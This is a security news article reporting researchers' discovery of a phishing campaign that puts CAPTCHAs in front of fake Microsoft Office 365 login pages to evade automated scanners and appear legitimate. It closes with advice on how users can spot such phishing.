One more phishing campaign is in the wild targeting users with evasive techniques. As observed, the new phishing campaign aiming at MSOffice 365 credentials remains hidden by applying CAPTCHAs to ditch automated crawlers.
MSOffice 365 Phishing Campaign Exploiting CAPTCHAs
Researchers from Menlo Threat Labs at Menlo Security have discovered a new phishing campaign in the wild. This phishing campaign strives at stealing data from the users of Microsoft Office 365.
As described in their blog post, the phishing attack proceeds like any other phishing campaign, luring the victim to fake pages. Here, the attackers mimic Microsoft Office 365 page to bluff users and steal their credentials.
However, what’s different with this MSOffice 365 phishing campaign is how it uses legit CAPTCHAs.
After redirecting the target user to the phishing page, the attack requires the user to solve a CAPTCHA first. With this additional step, the attackers aim at ensuring human interaction and repel automated security tools. Simultaneously, this trick makes the victims trust the legitimacy of the phishing web page.
As stated in their post,
Two important things are happening here. The first is that the user is made to think that this is a legitimate site, because their cognitive bias has trained them to believe that checks like these appear only on benign websites. The second thing this strategy does is to defeat automated crawling systems attempting to identify phishing attacks.
Hence, the attack requires the user to solve at least 3-4 CAPTCHA images before landing at the actual phishing page.
Phishing Exploiting CAPTCHAs Isn’t New
This isn’t the first time that a phishing campaign has exploited CAPTCHAs.
Earlier this year, Microsoft warned about an Excel malware campaign that also exploited CAPTCHAs to bypass automated checks. Solving the CAPTCHAs would then download the malware stealthily to the victim’s device.
Thus, the users should remain wary of such phishing attacks by vigilantly monitoring their emails. Regardless of how legit an email or a web page (redirected from the email’s URL) looks, double-check for its legitimacy, especially, if it asks you to enter login credentials or personal information. It’s always good to reach out to the apparent sender of the email via some other means to validate the emails received.